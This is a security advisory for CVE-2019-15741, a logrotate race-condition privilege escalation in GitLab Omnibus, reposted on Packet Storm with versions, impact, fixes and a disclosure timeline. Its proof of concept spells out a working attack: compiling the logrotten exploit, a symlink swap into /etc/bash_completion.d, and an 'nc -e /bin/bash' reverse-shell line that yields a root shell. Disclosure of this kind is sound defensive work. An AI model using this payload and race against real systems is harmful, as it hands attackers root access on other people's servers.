exploit the possibilities

GitLab Omnibus 12.2.1 Logrotate Privilege Escalation

GitLab Omnibus 12.2.1 Logrotate Privilege Escalation
Posted Oct 5, 2019
Authored by Wolfgang Hotwagner

Gitlab Omnibus versions 7.4 through 12.2.1 suffer from a privilege escalation vulnerability that leverages a race condition in logrotate, resulting in a root shell.

tags | exploit, shell, root
advisories | CVE-2019-15741
MD5 | 3955d1e8b33d1e3a16022e0127d1dc28

GitLab Omnibus 12.2.1 Logrotate Privilege Escalation

Change Mirror Download
# Privilege Escalation via Logrotate in Gitlab Omnibus 

## Overview
Identifier: AIT-SA-20190930-01
Target: GitLab Omnibus
Vendor: GitLab
Version: 7.4 through 12.2.1
Fixed in Version: 12.2.3, 12.1.8 and 12.0.8
CVE: CVE-2019-15741
Accessibility: Local
Severity: Low
Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)


## Summary
Omnibus GitLab is a way to package different services and tools required to run GitLab, so that most users can install it without laborious configuration.


## Vulnerability Description
GitLab Omnibus sets the ownership of the log directory to the system-user "git", which might let local users obtain root access because of unsafe
interaction with logrotate.

User “git” owns the log directory /var/log/gitlab:

```
# logdir in gitlab-ee:
drwxr-xr-x 19 git root 4096 May 12 18:43 /var/log/gitlab/
```

Log files rotate once a day (or any other frequency if configured) by logrotate as user root. The configuration does not use the “su” directive:
```
# logrotate-config of gitlab-ee:
/var/log/gitlab/gitlab-workhorse/*.log {
hourly
rotate 30
compress
copytruncate
missingok
postrotate
endscript
}
```

Due to logrotate is prone to a race-condition it is possible for user "git" to replace the
directory /var/log/gitlab/gitlab-workhorse/ with a symbolic link to any
directory(for example /etc/bash_completion.d). Logrotate will place
files as user “root” into /etc/bash_completition.d and set the owner of the file to "git".
An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse
root-shell will be executed.

Details of the race-condition in logrotate can be found at:
* https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
* https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
* https://github.com/whotwagner/logrotten

## Proof of Concept
The following example illustrates how an attacker who already gained a shell as user “git”, can elevate his privileges to “root”. After downloading and compiling,
the exploit gets executed and waits until the next daily run of logrotate. If the rotation of the log file succeeds, a new file that contains the reverse shell
payload, will be written into /etc/bash_completition.d/ with owner “git”. As soon as root logs in, the reverse shell gets executed and opens a shell on the
attackers netcat listener:

```
git@Stretch64:~$ git clone https://github.com/whotwagner/logrotten.git
/tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
git@Stretch64:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c
git@Stretch64:/tmp/logrotten$ ./logrotten -c /var/log/gitlab/gitlab-
workhorse/something.log
Waiting for rotating /var/log/gitlab/gitlab-workhorse/something.log...
Renamed /var/log/gitlab/gitlab-workhorse with /var/log/gitlab/gitlab-workhorse2
and created symlink to /etc/bash_completion.d
Done!
git@Stretch64:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root root 439 Sep 28 2018 git-prompt
-rw-r--r-- 1 root root 11144 Oct 28 2018 grub
-rw-r--r-- 1 git git 33 May 12 18:44 something.log.1.gz
git@Stretch64:/tmp/logrotten$ echo "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e
/bin/bash localhost 3333 &); fi" > /etc/bash_completion.d/something.log.1.gz
git@Stretch64:/tmp/logrotten$ nc -nvlp 3333
listening on [any] 3333 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 32
drwx------ 4 root root 4096 May 12 18:47 .
drwxr-xr-x 22 root root 4096 Apr 25 18:31 ..
-rw------- 1 root root 1405 May 12 19:59 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4096 May 12 18:47 .config
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Apr 25 18:40 .ssh
-rw------- 1 root root 2194 May 12 17:29 .viminfo
```

## Vulnerable Versions
7.4 through 12.2.1

## Impact
An attacker who already achieved a valid shell as user “git” could elevate the privileges to “root”. The fact that another exploit is
needed to get a shell lowers the severity from high to low.

## Solution
Update to GitLab Security Release: 12.2.3, 12.1.8, and 12.0.8

## References:
* https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/
* https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380
* https://hackerone.com/reports/578119

## Vendor Contact Timeline

* `2019-05-12` Contacting vendor through HackerOne
* `2019-05-31` GitLab acknowledges the vulnerability
* `2019-08-22` Notification from GitLab about the release that includes a patch
* `2019-08-30` GitLab changed the severity from high to low and released an update that fixed the problem
* `2019-09-30` Public disclosure

## Advisory URL
http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus





Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close